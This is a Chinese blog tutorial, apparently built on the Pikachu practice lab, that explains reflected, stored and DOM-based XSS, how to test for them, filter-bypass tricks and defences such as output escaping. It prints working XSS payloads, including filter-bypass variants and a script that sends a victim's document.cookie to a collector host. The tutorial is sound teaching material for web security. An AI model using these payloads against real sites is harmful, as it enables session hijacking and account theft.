跨站脚本(XSS)漏洞_跨站脚本漏洞

最新推荐文章于 2024-06-24 22:16:50 发布
最新推荐文章于 2024-06-24 22:16:50 发布
阅读量1.1k 收藏 13
点赞数 14
文章标签: xss 前端 windows 安全 网络安全 web安全 漏洞挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jennycisp/article/details/138799982
版权
文章目录
  • 跨站脚本(XSS)漏洞概述
  • 跨站脚本(xss)漏洞类型及测试流程
    • 一,漏洞类型
    • 二,测试流程
  • 反射型跨站脚本漏洞之get&post
    • 发射型xss演示
    • get和post典型区别
  • 存储型XSS和DOM型XSS的解析
    • 存储型
    • DOM型
    • 存储型xss演示
    • DOM型XSS演示
  • XSS漏洞测试:cookie获取和钓鱼攻击演示
    • 案例1:xss如何获取cookie?
      • GET型XSS利用:cookie获取演示
      • 跨域的概念
      • 跨域 - 同源策略
  • XSS盲打
    • 盲打的概念
    • 演示
  • XSS绕过
    • xss绕过 - 过滤 - 转换
    • xss绕过 - 过滤 - 编码
    • xss绕过实验演
    • xss绕过 - 关于htmlspecialchars() 函数
      • 预定义的字符
      • 可用的引号类型
      • 演示
  • XSS常见的防范措施
    • xss之href输出的演示
    • xss之js输出的演示

跨站脚本(XSS)漏洞概述

Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:
1.反射性XSS;
2.存储型XSS;
3.DOM型XSS;

XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。

XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。

XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。甚至可以结合浏览器自身漏洞对用户主机进行远程控制等。

形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。

因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:

  • 输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
  • 输出转义:根据输出点的位置对输出到前端的内容进行适当转义;

跨站脚本(xss)漏洞类型及测试流程

一,漏洞类型

危害等级:存储型 > 反射型 > DOM型

☼ 反射型
交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询类界面等。

☼ 存储型(持久型XSS)
交互的数据会被存在数据库里面,永久性存储,一般出现在留言板,注册等页面。

☼ DOM型
不与后台服务器产生交互,是一种通过DOM操作前端代码输出的时候产生的问题,一次性也属于反射型。

二,测试流程

① 在目标站点上找到输入点,比如查询接口、留言板等;
② 输入一组 “特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;
③ 通过搜索定位到唯一字符,结合唯一字符前后语法确认知否可以构造执行js的条件(构造闭合);
④ 提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行说明存在XSS漏洞。

tips:
1.一般查询接口容易出现反射型XSS,留言板容易出现存储型XSS;
2.由于后台可能存在过滤措施,构造的script可能会被过滤掉,而无法生效,或者环境限制了执行(浏览器);
3.通过变换不同的script,尝试绕过后台过滤机制。

反射型跨站脚本漏洞之get&post

get方式的XSS漏洞更容易被利用,一般利用的方式是将带有跨站脚本的URL伪装后发送给目标而post方式由于是以表单方式提交,无法直接使用URL方式进行攻击,如何利用?

发射型xss演示

打开web开发者工具,将文本框的最大输入值改大些,再向框中输入<script>("xss")</script>,单击提交按钮。
在这里插入图片描述

get和post典型区别

  • get是以url方式提交数据;
  • post是以表单方式在请求体里面提交数据。

存储型XSS和DOM型XSS的解析

存储型

存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以将脚本注入到后台存储起来,构成更加持久的危害,因此存储型XSS也称“永久型”XSS。

DOM型

在这里插入图片描述
通过JavaScript,可以重排整个HTML文档。您可以添加、移除、改变或重排页面上的项目。

要改变页面的某个东西,JavaScript就需要获得对HTML文档中所有元素进行访问的入口。这个入口,连同对HTML元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模型来获得的(DOM)。

所以,你可以把DOM理解为一个一个访问HTML的标准编程接口。

存储型xss演示

在文本框中输入<script>("xss")</script>,单击提交,来回切换页面,它也会弹出对话框,因为它已经存储在数据库中,所以会反复执行。
在这里插入图片描述

DOM型XSS演示

JavaScript代码

<script>
                    function domxss(){
                        var str = document.getElementById("text").value;
                        document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
                    }
                    //试试:'><img src="#" οnmοuseοver="alert('xss')">
                    //试试:' οnclick="alert('xss')">,闭合掉就行
                </script>

输入#' onclick="alert(111)">,点击提交。
在这里插入图片描述

XSS漏洞测试:cookie获取和钓鱼攻击演示

  • XSS漏洞测试:cookie的窃取和利用
  • XSS漏洞测试:钓鱼攻击
  • XSS漏洞测试:xss获取键盘记录

案例1:xss如何获取cookie?

GET型XSS利用:cookie获取演示

在这里插入图片描述1.安装pkxss后台。
在这里插入图片描述

在这里插入图片描述
2.输入下面的JavaScript代码到getxss文本框中,单击提交,最后在pkxss后台查看cookie信息。
<script>document.location = 'http://pikachu:808/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

在这里插入图片描述

跨域的概念
http://   www   .   xyz.com   :   8080   /   script/test.js
 协议    子域名       主域名        端口         资源地址

当协议、主机(主域名,子域名)、端口中的任意一个不同时,称为不同域。
我们把不同的域之间请求数据的操作,称为跨域操作。

跨域 - 同源策略

为了安全考虑,所有的浏览器都约定了“同源策略”,同源策略规定,两个不同域名之间不能使用js进行互相操作。比如:x.com域名的JavaScript并不能操作y.com域下的对象。

如果想要跨域操作,则需要管理员进行特殊的配置。
比如通过:header( “Access-Control-Allow-Origin:x.com” )指定。

Tips:下面这些标签跨域加载资源(资源类型是有限制的)是不受同源策略限制的。

< s c r i p t s r c = " . . . " > / / j s , 加 载 到 本 地 执 行

XSS盲打

盲打的概念

盲打仅仅是一种惯称的说法,就是不知道后台不知道有没有xss存在的情况下,不顾一切的输入xss代码在留言啊,feedback啊之类的地方,尽可能多的尝试xss的语句与语句的存在方式,就叫盲打。

“xss盲打”是指在攻击者对数据提交后展现的后台未知的情况下,站点採用了攻击者插入了带真实攻击功能的xss攻击代码(一般是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发xss来实现攻击者预定好的“真实攻击功能”。

通俗讲就是见到输入框就输入提前准备的xss代码,一般是使用script标签引入远程的js代码,当有后台人员审核提交数据时候,点击了提交的数据,触发获取到有价值信息。

演示

<script>alert("xss md")</script>

XSS绕过

xss绕过 - 过滤 - 转换

  1. 前端限制绕过,直接抓包重放,或者修改HTML前端代码。
  2. 大小写,比如:<SCRIPT>aLert("xss绕过")</sCRIPt>
  3. 拼凑:<scri<script>pt>alert(xss绕过)</scri<script>pt>
  4. 使用注释进行干扰:<scri<!--test-->pt>alert(xss绕过)<sc <!--test--> ript>

xss绕过 - 过滤 - 编码

核心思路:
后台过滤了特殊字符,比如<script>标签,但该标签可以被各种编码,后台不一定会过滤当浏览器对该编码进行识别时,会翻译成正常的标签,从而执行。

:在使用编码时需要注意编码在输出点是否会被正常识别或翻译!

xss绕过实验演

<img src=x onerror="alert("xss绕过")"/>

xss绕过 - 关于htmlspecialchars() 函数

htmlspecialchars() 函数把预定义的字符转换为html实体。

预定义的字符
  • &(和号)成为&amp
  • " (双引号)成为&quat
  • ’ (单引号)成为&#039
  • < < < (小于号)成为&lt
  • > > > (大于号)成为&gt
可用的引号类型
  • ENT_COMPAT - 默认,仅编码双引号。
  • ENT_QUOTES - 编码双引号和单引号。
  • ENT_NOQUOTES - 不编码任何引导。
演示

q' onclick='alert(xss绕过)'

XSS常见的防范措施

总的原则:输入做过滤,输出做转义。

  • 过滤:根据业务需求进行过滤,比如输入点要求输入手机号,则只允许输入手机号格式的数字。
  • 转义:所有输出到前端的数据都根据输出点进行转义,比如输入到html中进行html实体转义,输入到js里面进行js转义。

xss之href输出的演示

JavaScript:alert(xss href)

xss之js输出的演示

x'</script><script>alert("xss js")</script>

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

学习资源分享,微信扫码免费领取~

在这里插入图片描述

在这里插入图片描述

网络安全技术库
关注
  • 14
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
XSS跨站脚本漏洞简介、原理及防护方法
m0_54899775的博客
03-21 7863
XSS跨站脚本漏洞简介、原理及防护方法 XSS跨站漏洞原理及防护
跨站脚本攻击漏洞怎么修复_十大常见web漏洞——跨站脚本漏洞
weixin_39863155的博客
12-14 4043
跨站脚本漏洞(Cross-site scripting,通常简称为XSS)发生在客户端,可被用于进行窃取隐私、钓鱼欺骗、窃取密码、传播恶意代码等攻击。XSS攻击使用到的技术主要为HTML和Javascript,也包括VBScript和ActionScript等。XSS攻击对WEB服务器虽无直接危害,但是它借助网站进行传播,使网站的使用用户受到攻击,导致网站用户帐号被窃取,从而对网站也产生了较严重的...
跨站脚本漏洞XSS
qq_48904485的博客
03-22 8432
一、XSS跨站脚本基础 1、XSS漏洞介绍 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 2、XSS漏洞原理 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执
跨站脚本攻击漏洞XSS):基础知识和防御策略
weixin_43263566的博客
01-16 9720
跨站脚本攻击漏洞-基础篇
XSS(跨站脚本攻击)漏洞解析(带靶场演示)
最新发布
wudideaqing的博客
06-24 1502
XSS跨站脚本攻击,全称Cross-Site Scripting)是一种常见网络安全漏洞,允许攻击者在用户浏览器中执行恶意脚本。攻击者通过在受信任网站中注入恶意代码,诱骗用户点击或加载恶意内容,从而窃取数据、篡改页面或劫持用户。
跨站脚本XSS漏洞
梁辰兴的博客
06-07 4906
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。甚至可以结合浏览器自身漏洞对用户主机进行远程控制等。形
Web漏洞探索】跨站脚本漏洞
kjcxmx的博客
08-03 3978
跨站脚本(Cross-site scripting简称为"CSS",为避免与前端叠成样式表的缩写"CSS"冲突,故称为XSS)允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过同源策略,该策略旨在将不同的网站相互隔离。跨站脚本漏洞通常允许攻击者伪装成受害者用户,执行用户能够执行的任何操作,并访问用户的任何数据。如果受害者用户在应用程序中具有特权访问权限,那么攻击者可能能够完全控制应用程序的所有功能和数据。XSS跨站脚本是一种网站应用程序的安全漏洞攻击,是代码注入的一种。...
网络安全跨站脚本攻击漏洞(了解)
love_wgll的博客
03-02 638
介绍跨站脚本攻击漏洞
XSS跨站脚本攻击漏洞修复方法
06-18
### XSS漏洞修复策略 1. **输入验证与过滤**: 对所有用户提交的数据进行严格的检查,限制特定字符或字符集,避免危险脚本的输入。 2. **输出编码**: 在将用户输入的数据展示在页面上时,应使用适当的编码方式...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击知识点总结 xss跨站脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网站上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss跨站脚本攻击的知识点总结:...
XSS跨站脚本攻击
01-27
跨站脚本攻击(XSS)是Web应用程序中常见的安全问题,主要源于开发人员未对用户提交的数据进行充分的过滤和转义。攻击者利用这一弱点,能够在网页中注入恶意脚本,使得其他用户在访问该页面时执行这些脚本,从而导致...
XSS跨站脚本攻击剖析与防御.pdf
05-16
第4章 发掘XSS漏洞,着重以黑盒和白盒的角度介绍如何发掘XSS漏洞,以便帮助读者树立安全意识。第5章 XSS Worm,讲解了Web 2.0的最大威胁——跨站脚本蠕虫,剖析了Web 2.0相关概念和其核心技术,这些知识对于理解和...
WEB漏洞原理】XSS 跨站脚本攻击
过期的秋刀鱼
08-26 2325
当用户访问被XSS 脚本注入过的网页,XSS 脚本就会被提取出来,用户浏览器就会解析执行这段代码,也就是说用户被攻击了。DOM 型XSS 是一种XSS 攻击,其中攻击的代码是由于修改受害者浏览器页面的DOM 树而执行的。搜索框、登录框、微博、留言板、聊天室等等收集用户输入的地方,都有可能被注入XSS 代码,都存在遭受XSS 的风险。XSS 攻击目标是客户端浏览器用户,由于浏览器的类别不同,攻击效果不同,甚至于同一款浏览器,攻击效果都不一样。浏览器的类型,版本等因素都会影响XSS 的效果。
漏洞篇(XSS 跨站脚本攻击一)
m0_58001548的博客
04-08 2411
1、Cookie 概述:Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":(1)、当用户访问 web 页面时,他的名字可以记录在 cookie 中。2)、在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。Cookie 以键值对形式存储,如下所示:
浅谈“XSS跨站脚本攻击漏洞
→_→
05-20 1217
漏洞名称: 存储型XSS跨站脚本,反射型XSS跨站脚本, 描述: 跨站脚本攻击的英文全称是Cross Site Script,为了和样式表区分,缩写为XSS。发生的原因是网站将用户输入的内容输出到页面上,在这个过程中可能有恶意代码被浏览器执行。跨站脚本攻击,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。而本文主要讲的是利用X
跨站脚本漏洞(XSS)浅析
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-06 1824
一、跨站脚本漏洞概述 1、漏洞概述 XSS漏洞一直是web漏洞中危害比较大的漏洞,在OWASP TOP10中一直是排在前三的。 XSS是一种发生在Web前端漏洞,所以其危害的对象也主要是前端用户。 XSS通常可以用于带钓鱼、前端JS挖矿、获取用户cookie等。甚至结合浏览器自身漏洞可以对用户主机进行控制。 2、攻击流程(窃取cookie) 用户访问XSS页面,触发XSS脚本,服务器返回“带恶意JS的”页面 客户端执行脚本,发送窃取到的cookie 攻击者使用窃取到的cookie伪造用户登录,造成破
渗透测试技术----常见web漏洞--跨站脚本攻击原理及防御
wwl012345的博客
08-16 3169
一、跨站脚本攻击介绍 1.跨站脚本攻击简介 跨站脚本攻击(Cross-Site Scripting)简称为XSS(本来为CSS,但是与前端语言CSS容易产生歧义,故取名为XSS),XSS是一种针对于网站应用程序(Web客户端)的安全漏洞攻击技术,是代码注入的一种,它允许攻击者将恶意JS代码注入到网页,这样其他用户在访问网页时就会受到影响。攻击者利用XSS代码攻击成功后,可能得到一些高权限来执行一...
XSS-跨站脚本攻击 漏洞详解
m0_69043895的博客
04-20 1478
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
存储型跨站脚本漏洞校验
kzhzhang的专栏
12-31 2933
存储型跨站脚本漏洞校验
XSS跨站脚本 xss_script_tag
07-09
X(跨站脚本攻击)是一种常见网络安全漏洞,攻击者通过注恶意脚本代码来攻击网站的用户。其中,xss_script_tag指的是一种XSS攻击的方式,即通过在HTML标签中嵌入恶意脚本。 例如,攻击者可能会在一个script标签中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络安全技术库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值